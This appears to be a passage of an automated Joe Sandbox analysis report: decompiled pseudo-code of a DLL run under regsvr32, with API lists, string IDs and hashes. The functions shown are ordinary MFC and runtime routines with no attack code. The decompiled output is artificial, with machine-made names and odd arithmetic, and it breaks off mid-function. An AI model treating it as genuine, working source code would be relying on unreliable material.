                                                                                                                				void* _t66;
                                                                                                                				short* _t70;
                                                                                                                				signed int _t72;
                                                                                                                				signed int _t81;
                                                                                                                				signed int* _t83;
                                                                                                                				short* _t84;
                                                                                                                				void* _t91;
                                                                                                                				signed int* _t98;
                                                                                                                				signed int _t99;
                                                                                                                				void** _t100;
                                                                                                                				intOrPtr _t102;
                                                                                                                				signed int _t104;
                                                                                                                				signed int _t106;
                                                                                                                				void* _t107;
                                                                                                                
                                                                                                                				_t101 = __esi;
                                                                                                                				_t97 = __edx;
                                                                                                                				_t82 = __ebx;
                                                                                                                				_t54 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t54 ^ _t106;
                                                                                                                				_t100 = __ecx;
                                                                                                                				_v76 = _a4;
                                                                                                                				if(__ecx[1] != 0) {
                                                                                                                					_push(__ebx);
                                                                                                                					_push(__esi);
                                                                                                                					_t83 = GlobalLock( *__ecx);
                                                                                                                					_v84 = _t83;
                                                                                                                					_v88 = 0 | _t83[0] == 0x0000ffff;
                                                                                                                					_v80 = E1002A0B5(_t83);
                                                                                                                					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
                                                                                                                					_v92 = _t102;
                                                                                                                					if(_v88 == 0) {
                                                                                                                						 *_t83 =  *_t83 | 0x00000040;
                                                                                                                					} else {
                                                                                                                						_t83[3] = _t83[3] | 0x00000040;
                                                                                                                					}
                                                                                                                					if(lstrlenA(_v76) >= 0x20) {
                                                                                                                						L15:
                                                                                                                						_t66 = 0;
                                                                                                                					} else {
                                                                                                                						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
                                                                                                                						_v76 = _t97;
                                                                                                                						if(_t97 < _t102) {
                                                                                                                							goto L15;
                                                                                                                						} else {
                                                                                                                							_t70 = E1002A121(_t83);
                                                                                                                							_t91 = 0;
                                                                                                                							_t84 = _t70;
                                                                                                                							if(_v80 != 0) {
                                                                                                                								_t81 = E100483AC(_t84 + _t102);
                                                                                                                								_t97 = _v76;
                                                                                                                								_t91 = _t102 + 2 + _t81 * 2;
                                                                                                                							}
                                                                                                                							_t33 = _t97 + 3; // 0x3
                                                                                                                							_t98 = _v84;
                                                                                                                							_t36 = _t84 + 3; // 0x10002
                                                                                                                							_t72 = _t91 + _t36 & 0xfffffffc;
                                                                                                                							_t104 = _t84 + _t33 & 0xfffffffc;
                                                                                                                							_v80 = _t72;
                                                                                                                							if(_v88 == 0) {
                                                                                                                								_t99 =  *(_t98 + 8) & 0x0000ffff;
                                                                                                                							} else {
                                                                                                                								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
                                                                                                                							}
                                                                                                                							if(_v76 == _t91 || _t99 <= 0) {
                                                                                                                								L17:
                                                                                                                								 *_t84 = _a8;
                                                                                                                								_t97 =  &_v72;
                                                                                                                								E100224F1(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
                                                                                                                								_t100[1] = _t100[1] + _t104 - _v80;
                                                                                                                								GlobalUnlock( *_t100);
                                                                                                                								_t100[2] = _t100[2] & 0x00000000;
                                                                                                                								_t66 = 1;
                                                                                                                							} else {
                                                                                                                								_t97 = _t100[1];
                                                                                                                								_t95 = _t97 - _t72 + _v84;
                                                                                                                								if(_t97 - _t72 + _v84 <= _t97) {
                                                                                                                									E100224F1(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
                                                                                                                									_t107 = _t107 + 0x10;
                                                                                                                									goto L17;
                                                                                                                								} else {
                                                                                                                									goto L15;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_pop(_t101);
                                                                                                                					_pop(_t82);
                                                                                                                				} else {
                                                                                                                					_t66 = 0;
                                                                                                                				}
                                                                                                                				return E1004763E(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
                                                                                                                			}




























                                                                                                                APIs
                                                                                                                • GlobalLock.KERNEL32 ref: 1002A49B
                                                                                                                • lstrlenA.KERNEL32(?), ref: 1002A4E3
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002A4FD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                • String ID: System
                                                                                                                • API String ID: 1529587224-3470857405
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10050D2D(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int* _t28;
                                                                                                                				void* _t29;
                                                                                                                				signed int* _t31;
                                                                                                                				void* _t33;
                                                                                                                				intOrPtr _t34;
                                                                                                                				intOrPtr _t36;
                                                                                                                				signed int* _t38;
                                                                                                                				signed int _t41;
                                                                                                                				signed int _t49;
                                                                                                                				signed int _t52;
                                                                                                                				void* _t53;
                                                                                                                				signed int _t55;
                                                                                                                				signed int _t57;
                                                                                                                				signed int _t59;
                                                                                                                				void* _t61;
                                                                                                                				void* _t62;
                                                                                                                
                                                                                                                				_t28 = _a4;
                                                                                                                				_t62 = _t61 - 0x10;
                                                                                                                				if(_t28 != 0) {
                                                                                                                					_t49 = _a12;
                                                                                                                					_t59 =  *_t28;
                                                                                                                					_t55 = _a8;
                                                                                                                					__eflags = _t55;
                                                                                                                					if(_t55 == 0) {
                                                                                                                						L4:
                                                                                                                						_t29 =  *_t59;
                                                                                                                						__eflags = _t29 - 0xe0434f4d;
                                                                                                                						if(_t29 == 0xe0434f4d) {
                                                                                                                							L21:
                                                                                                                							__eflags = _t29 - 0xe06d7363;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								L29:
                                                                                                                								_t31 = E100516CA(_t53, _t55, __eflags) + 0x90;
                                                                                                                								 *_t31 =  *_t31 + 1;
                                                                                                                								__eflags =  *_t31;
                                                                                                                								goto L30;
                                                                                                                							} else {
                                                                                                                								__eflags =  *((intOrPtr*)(_t59 + 0x10)) - 3;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									goto L29;
                                                                                                                								} else {
                                                                                                                									_t34 =  *((intOrPtr*)(_t59 + 0x14));
                                                                                                                									__eflags = _t34 - 0x19930520;
                                                                                                                									if(_t34 == 0x19930520) {
                                                                                                                										L26:
                                                                                                                										__eflags =  *(_t59 + 0x1c);
                                                                                                                										if(__eflags != 0) {
                                                                                                                											goto L29;
                                                                                                                										} else {
                                                                                                                											__eflags =  *(E100516CA(_t53, _t55, __eflags) + 0x88);
                                                                                                                											if(__eflags != 0) {
                                                                                                                												goto L29;
                                                                                                                											} else {
                                                                                                                												goto L28;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										__eflags = _t34 - 0x19930521;
                                                                                                                										if(_t34 == 0x19930521) {
                                                                                                                											goto L26;
                                                                                                                										} else {
                                                                                                                											__eflags = _t34 - 0x19930522;
                                                                                                                											if(__eflags != 0) {
                                                                                                                												goto L29;
                                                                                                                											} else {
                                                                                                                												goto L26;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							__eflags = _t49 & 0x00000040;
                                                                                                                							if((_t49 & 0x00000040) == 0) {
                                                                                                                								goto L21;
                                                                                                                							} else {
                                                                                                                								goto L6;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						__eflags =  *((char*)(_t55 + 8));
                                                                                                                						if( *((char*)(_t55 + 8)) != 0) {
                                                                                                                							L6:
                                                                                                                							__eflags =  *_t59 - 0xe06d7363;
                                                                                                                							if( *_t59 != 0xe06d7363) {
                                                                                                                								L28:
                                                                                                                								_t33 = 0;
                                                                                                                							} else {
                                                                                                                								__eflags =  *((intOrPtr*)(_t59 + 0x10)) - 3;
                                                                                                                								if( *((intOrPtr*)(_t59 + 0x10)) != 3) {
                                                                                                                									goto L28;
                                                                                                                								} else {
                                                                                                                									_t36 =  *((intOrPtr*)(_t59 + 0x14));
                                                                                                                									__eflags = _t36 - 0x19930520;
                                                                                                                									if(_t36 == 0x19930520) {
                                                                                                                										L11:
                                                                                                                										__eflags =  *(_t59 + 0x1c);
                                                                                                                										if(__eflags != 0) {
                                                                                                                											L14:
                                                                                                                											_t38 =  *( *(_t59 + 0x1c) + 0xc);
                                                                                                                											_v16 = _t55;
                                                                                                                											_t57 =  *_t38;
                                                                                                                											_v20 = _t49 | 0x80000000;
                                                                                                                											_t52 =  &(_t38[1]);
                                                                                                                											while(1) {
                                                                                                                												__eflags = _t57;
                                                                                                                												if(_t57 <= 0) {
                                                                                                                													break;
                                                                                                                												}
                                                                                                                												_a4 =  *_t52;
                                                                                                                												_t41 = E100502AB( &_v20,  *_t52,  *(_t59 + 0x1c));
                                                                                                                												_t62 = _t62 + 0xc;
                                                                                                                												__eflags = _t41;
                                                                                                                												if(__eflags != 0) {
                                                                                                                													 *((intOrPtr*)(E100516CA(_t53, _t57, __eflags) + 0x90)) =  *((intOrPtr*)(E100516CA(_t53, _t57, __eflags) + 0x90)) + 1;
                                                                                                                													__eflags = _a16;
                                                                                                                													if(__eflags != 0) {
                                                                                                                														_push(_a4);
                                                                                                                														_push( &_v20);
                                                                                                                														_push(_a16);
                                                                                                                														_push(_t59);
                                                                                                                														E10050C9C(_t52, _t57, _t59, __eflags);
                                                                                                                													}
                                                                                                                													L30:
                                                                                                                													_t33 = 1;
                                                                                                                													__eflags = 1;
                                                                                                                												} else {
                                                                                                                													_t57 = _t57 - 1;
                                                                                                                													_t52 = _t52 + 4;
                                                                                                                													__eflags = _t52;
                                                                                                                													continue;
                                                                                                                												}
                                                                                                                												goto L31;
                                                                                                                											}
                                                                                                                											goto L28;
                                                                                                                										} else {
                                                                                                                											__eflags =  *(E100516CA(_t53, _t55, __eflags) + 0x88);
                                                                                                                											if(__eflags == 0) {
                                                                                                                												goto L28;
                                                                                                                											} else {
                                                                                                                												_t59 =  *(E100516CA(_t53, _t55, __eflags) + 0x88);
                                                                                                                												goto L14;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										__eflags = _t36 - 0x19930521;
                                                                                                                										if(_t36 == 0x19930521) {
                                                                                                                											goto L11;
                                                                                                                										} else {
                                                                                                                											__eflags = _t36 - 0x19930522;
                                                                                                                											if(_t36 != 0x19930522) {
                                                                                                                												goto L28;
                                                                                                                											} else {
                                                                                                                												goto L11;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							goto L4;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L31:
                                                                                                                					return _t33;
                                                                                                                				} else {
                                                                                                                					return _t28;
                                                                                                                				}
                                                                                                                			}

























                                                                                                                0x10050dda
                                                                                                                0x10050de2
                                                                                                                0x10050de7
                                                                                                                0x10050dea
                                                                                                                0x10050dec
                                                                                                                0x10050e02
                                                                                                                0x10050e04
                                                                                                                0x10050e08
                                                                                                                0x10050e0a
                                                                                                                0x10050e10
                                                                                                                0x10050e11
                                                                                                                0x10050e14
                                                                                                                0x10050e15
                                                                                                                0x10050e1a
                                                                                                                0x10050e68
                                                                                                                0x10050e6a
                                                                                                                0x10050e6a
                                                                                                                0x10050dee
                                                                                                                0x10050dee
                                                                                                                0x10050def
                                                                                                                0x10050def
                                                                                                                0x00000000
                                                                                                                0x10050def
                                                                                                                0x00000000
                                                                                                                0x10050dec
                                                                                                                0x00000000
                                                                                                                0x10050d9f
                                                                                                                0x10050da4
                                                                                                                0x10050dab
                                                                                                                0x00000000
                                                                                                                0x10050db1
                                                                                                                0x10050db6
                                                                                                                0x00000000
                                                                                                                0x10050db6
                                                                                                                0x10050dab
                                                                                                                0x10050d87
                                                                                                                0x10050d87
                                                                                                                0x10050d8c
                                                                                                                0x00000000
                                                                                                                0x10050d8e
                                                                                                                0x10050d8e
                                                                                                                0x10050d93
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10050d93
                                                                                                                0x10050d8c
                                                                                                                0x10050d85
                                                                                                                0x10050d77
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10050d4f
                                                                                                                0x10050e6b
                                                                                                                0x10050e6f
                                                                                                                0x10050d3b
                                                                                                                0x10050d3b
                                                                                                                0x10050d3b

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: MOC$csm$csm
                                                                                                                • API String ID: 0-2232927589
                                                                                                                • Opcode ID: 01d0c4e04deef3b23751debaca89c328d60a6b307dfcb4c8aeed1ba256e0b420
                                                                                                                • Instruction ID: c785563120ba7acf1231274dc8805c591b12c91c46697228b9ee6d8b3a224c61
                                                                                                                • Opcode Fuzzy Hash: 01d0c4e04deef3b23751debaca89c328d60a6b307dfcb4c8aeed1ba256e0b420
                                                                                                                • Instruction Fuzzy Hash: DC314D369002469FDB60CEA4C84279D73F8EF00299F654D59F88597251E770ED4CCBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E1002B4A4(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, CHAR* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t33;
                                                                                                                				struct HINSTANCE__* _t44;
                                                                                                                				signed int _t45;
                                                                                                                				_Unknown_base(*)()* _t46;
                                                                                                                				intOrPtr _t53;
                                                                                                                				intOrPtr _t58;
                                                                                                                				void* _t74;
                                                                                                                				void* _t77;
                                                                                                                
                                                                                                                				_t76 = __esi;
                                                                                                                				_t75 = __edi;
                                                                                                                				_t74 = __edx;
                                                                                                                				_push(0x20);
                                                                                                                				E100476B6(0x100900e4, __ebx, __edi, __esi);
                                                                                                                				_t58 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
                                                                                                                				 *((intOrPtr*)(__ecx)) = 0x1009ddfc;
                                                                                                                				_t33 =  *((intOrPtr*)(__ecx + 0x44));
                                                                                                                				 *(_t77 - 4) = 2;
                                                                                                                				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
                                                                                                                				if(_t33 == 0) {
                                                                                                                					L7:
                                                                                                                					if( *((intOrPtr*)(_t58 + 0x4c)) == 0) {
                                                                                                                						L12:
                                                                                                                						E100213E6(_t58, _t58 + 0x24, _t75);
                                                                                                                						L10020F7B(_t58 + 0x64);
                                                                                                                						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
                                                                                                                						_push(_t77 - 0x20);
                                                                                                                						if(E10021182(_t58, 0x100a594c) >= 0) {
                                                                                                                							_t76 = "mfcm80.dll";
                                                                                                                							_t75 = _t77 - 0x1c;
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsw");
                                                                                                                							asm("movsb");
                                                                                                                							_t44 = GetModuleHandleA(_t77 - 0x1c);
                                                                                                                							if(_t44 != 0) {
                                                                                                                								_t46 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
                                                                                                                								if(_t46 != 0) {
                                                                                                                									 *_t46( *(_t77 - 0x20));
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_t45 =  *(_t77 - 0x20);
                                                                                                                							_t38 =  *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                						}
                                                                                                                						 *(_t77 - 4) = 1;
                                                                                                                						E100222E4(_t38, _t58, _t58 + 0x40, _t74);
                                                                                                                						 *(_t77 - 4) = 0;
                                                                                                                						E100215BB(_t58, _t58 + 0x24, _t74, _t75);
                                                                                                                						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
                                                                                                                						E10010C62(_t58);
                                                                                                                						return E10047739(_t58, _t75, _t76);
                                                                                                                					}
                                                                                                                					_t75 = _t58 + 0x40;
                                                                                                                					do {
                                                                                                                						_t76 = E100221E9(_t58, _t75, _t75, _t76);
                                                                                                                						_t85 = _t76;
                                                                                                                						if(_t76 != 0) {
                                                                                                                							E1002AB59(_t76);
                                                                                                                							_push(_t76);
                                                                                                                							E10009F3F(_t58, _t75, _t76, _t85);
                                                                                                                						}
                                                                                                                					} while ( *((intOrPtr*)(_t58 + 0x4c)) != 0);
                                                                                                                					goto L12;
                                                                                                                				} else {
                                                                                                                					_t75 = __ecx + 0x40;
                                                                                                                					do {
                                                                                                                						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
                                                                                                                						_t76 =  *((intOrPtr*)(E10012115(_t77 - 0x24)));
                                                                                                                						if(_t76 != 0) {
                                                                                                                							_t53 =  *((intOrPtr*)(_t76 + 4));
                                                                                                                							if(_t53 != 0) {
                                                                                                                								_t82 =  *((intOrPtr*)(_t53 + 0x90));
                                                                                                                								if( *((intOrPtr*)(_t53 + 0x90)) == 0) {
                                                                                                                									E1002223E(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
                                                                                                                									E1002AB59(_t76);
                                                                                                                									_push(_t76);
                                                                                                                									E10009F3F(_t58, _t75, _t76, _t82);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t33 =  *((intOrPtr*)(_t77 - 0x24));
                                                                                                                					} while (_t33 != 0);
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                			}











                                                                                                                0x1002b4f1
                                                                                                                0x1002b4f8
                                                                                                                0x1002b4ff
                                                                                                                0x1002b504
                                                                                                                0x1002b505
                                                                                                                0x1002b50a
                                                                                                                0x1002b4f1
                                                                                                                0x1002b4e8
                                                                                                                0x1002b50b
                                                                                                                0x1002b50e
                                                                                                                0x00000000
                                                                                                                0x1002b4cf

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1002B4AB
                                                                                                                • GetModuleHandleA.KERNEL32(?,100A594C,00000000,?), ref: 1002B576
                                                                                                                • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 1002B586
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                • API String ID: 2418878492-2500072749
                                                                                                                • Opcode ID: 80343a24d9ad312cc0189bf1200974e93c016c673bca73313ab3d4f112bb6e1d
                                                                                                                • Instruction ID: 5b1ac1d8a87dcaac49d10090e8121a3023399b1f3b7fcdc41daf1712c1936ba1
                                                                                                                • Opcode Fuzzy Hash: 80343a24d9ad312cc0189bf1200974e93c016c673bca73313ab3d4f112bb6e1d
                                                                                                                • Instruction Fuzzy Hash: A6319E34A00A15DBDB15DFA4E881BED77F5EF08340F8100A8E905AF282DB79EE04CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E1000B32A(void* __ebx, CHAR* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t30;
                                                                                                                				void* _t32;
                                                                                                                				void* _t35;
                                                                                                                				DEVMODEA* _t36;
                                                                                                                				CHAR** _t39;
                                                                                                                				signed short _t48;
                                                                                                                				signed short _t54;
                                                                                                                				intOrPtr _t56;
                                                                                                                				void* _t71;
                                                                                                                				CHAR** _t72;
                                                                                                                				signed short _t75;
                                                                                                                				CHAR** _t76;
                                                                                                                				struct HDC__* _t78;
                                                                                                                				void* _t79;
                                                                                                                				void* _t80;
                                                                                                                
                                                                                                                				_t69 = __edi;
                                                                                                                				_t52 = __ebx;
                                                                                                                				E100476B6(0x1008ddcd, __ebx, __edi, __esi);
                                                                                                                				 *0x100bb480(0x1c);
                                                                                                                				 *((intOrPtr*)(_t79 - 0x14)) = 0;
                                                                                                                				_t30 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                				 *((intOrPtr*)(_t79 - 4)) = 0;
                                                                                                                				if(_t30 != 0) {
                                                                                                                					_t54 =  *(_t30 + 0xa) & 0x0000ffff;
                                                                                                                					__eflags = _t54;
                                                                                                                					if(_t54 != 0) {
                                                                                                                						_t75 = (_t54 & 0x0000ffff) + _t30;
                                                                                                                						__eflags = _t75;
                                                                                                                					} else {
                                                                                                                						_t75 = 0;
                                                                                                                					}
                                                                                                                					_t56 = ( *(_t30 + 8) & 0x0000ffff) + _t30;
                                                                                                                					_t52 = ( *(_t30 + 4) & 0x0000ffff) + _t30;
                                                                                                                					_t71 = ( *(_t30 + 6) & 0x0000ffff) + _t30;
                                                                                                                					__eflags = _t75;
                                                                                                                					 *((intOrPtr*)(_t79 - 0x1c)) = _t56;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						_t32 = ( *(_t75 + 0x46) & 0x0000ffff) + 0x9c;
                                                                                                                						__eflags = _t32 - 0x400;
                                                                                                                						if(__eflags > 0) {
                                                                                                                							L11:
                                                                                                                							_t34 = ( *(_t75 + 0x46) & 0x0000ffff) + 0x9c;
                                                                                                                							__eflags = ( *(_t75 + 0x46) & 0x0000ffff) + 0x9c;
                                                                                                                							_t57 = _t79 - 0x14;
                                                                                                                							_t35 = L100012BC(_t52, _t79 - 0x14, 0, _t71, ( *(_t75 + 0x46) & 0x0000ffff) + 0x9c, _t34);
                                                                                                                							L12:
                                                                                                                							_t36 = E1000AC5A(_t57, _t35, _t75);
                                                                                                                							_t56 =  *((intOrPtr*)(_t79 - 0x1c));
                                                                                                                							 *(_t79 - 0x18) = _t36;
                                                                                                                							L13:
                                                                                                                							_push(_t56);
                                                                                                                							_t76 = E1000B053(_t52, _t79 - 0x28, _t71, _t75, __eflags);
                                                                                                                							_push(_t71);
                                                                                                                							 *((char*)(_t79 - 4)) = 1;
                                                                                                                							_t72 = E1000B053(_t52, _t79 - 0x20, _t71, _t76, __eflags);
                                                                                                                							_push(_t52);
                                                                                                                							 *((char*)(_t79 - 4)) = 2;
                                                                                                                							_t39 = E1000B053(_t52, _t79 - 0x24, _t72, _t76, __eflags);
                                                                                                                							_t69 =  *_t72;
                                                                                                                							_t78 = CreateDCA( *_t39,  *_t72,  *_t76,  *(_t79 - 0x18));
                                                                                                                							L100013E3( *((intOrPtr*)(_t79 - 0x24)) + 0xfffffff0, 0);
                                                                                                                							L100013E3( *((intOrPtr*)(_t79 - 0x20)) + 0xfffffff0, 0);
                                                                                                                							_t44 = L100013E3( *((intOrPtr*)(_t79 - 0x28)) + 0xfffffff0, 0);
                                                                                                                							L2:
                                                                                                                							L10001389(_t44, _t79 - 0x14);
                                                                                                                							return E10047739(_t52, _t69, _t78);
                                                                                                                						}
                                                                                                                						_t48 = L10001492(_t52, 0, _t71, _t75, __eflags);
                                                                                                                						__eflags = _t48;
                                                                                                                						_t57 = _t32;
                                                                                                                						if(_t48 == 0) {
                                                                                                                							goto L11;
                                                                                                                						}
                                                                                                                						E10048380(( *(_t75 + 0x46) & 0x0000ffff) + 0x9c);
                                                                                                                						_t35 = _t80;
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					 *(_t79 - 0x18) = 0;
                                                                                                                					goto L13;
                                                                                                                				}
                                                                                                                				_t78 = CreateDCA("DISPLAY", 0, 0, 0);
                                                                                                                				goto L2;
                                                                                                                			}



















                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1000B331
                                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 1000B353
                                                                                                                • __alloca_probe_16.LIBCMT ref: 1000B3C4
                                                                                                                • CreateDCA.GDI32(?,?,?,?), ref: 1000B41F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create$H_prolog3___alloca_probe_16
                                                                                                                • String ID: DISPLAY
                                                                                                                • API String ID: 1675797461-865373369
                                                                                                                • Opcode ID: 9827bb6cd6178643bf86aa37fe2b8c033721bd6de136d3be4650f1a94324d876
                                                                                                                • Instruction ID: c7dea487c0f5ddc0058b127140378c40b3c3e8784b0faee1b94e8b47be7bb17c
                                                                                                                • Opcode Fuzzy Hash: 9827bb6cd6178643bf86aa37fe2b8c033721bd6de136d3be4650f1a94324d876
                                                                                                                • Instruction Fuzzy Hash: 8631C175C00524CBEB24DFA4C895AFEB7F0EF84394F254129F856A7296EA346E40C6A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E1002BD4A(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t49;
                                                                                                                				signed int _t60;
                                                                                                                				signed int _t64;
                                                                                                                				signed int _t67;
                                                                                                                				signed int _t80;
                                                                                                                				signed int _t86;
                                                                                                                				intOrPtr* _t90;
                                                                                                                				void* _t91;
                                                                                                                
                                                                                                                				_t74 = __ebx;
                                                                                                                				_push(0x80);
                                                                                                                				E100476B6(0x10090176, __ebx, __edi, __esi);
                                                                                                                				_t49 =  *((intOrPtr*)(_t91 + 8));
                                                                                                                				_t90 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t91 - 0x50)) = 0;
                                                                                                                				 *((intOrPtr*)(_t91 - 0x54)) = 0x1009d434;
                                                                                                                				 *(_t91 - 4) = 0;
                                                                                                                				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
                                                                                                                					if(E10001230(_t91 - 0x54, 0x11) != 0 || E10001230(_t91 - 0x54, 0xd) != 0) {
                                                                                                                						_t49 = _t91 - 0x54;
                                                                                                                						goto L6;
                                                                                                                					} else {
                                                                                                                						 *((intOrPtr*)(_t90 + 0x64)) = 0;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L6:
                                                                                                                					_t11 = _t49 + 4; // 0x1001e491
                                                                                                                					GetObjectA( *_t11, 0x3c, _t91 - 0x4c);
                                                                                                                					_push(_t91 - 0x30);
                                                                                                                					 *(_t91 - 0x78) = 0x20;
                                                                                                                					E1000B9D2(_t74, _t91 - 0x58, 0, _t90, __eflags);
                                                                                                                					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
                                                                                                                					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
                                                                                                                					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
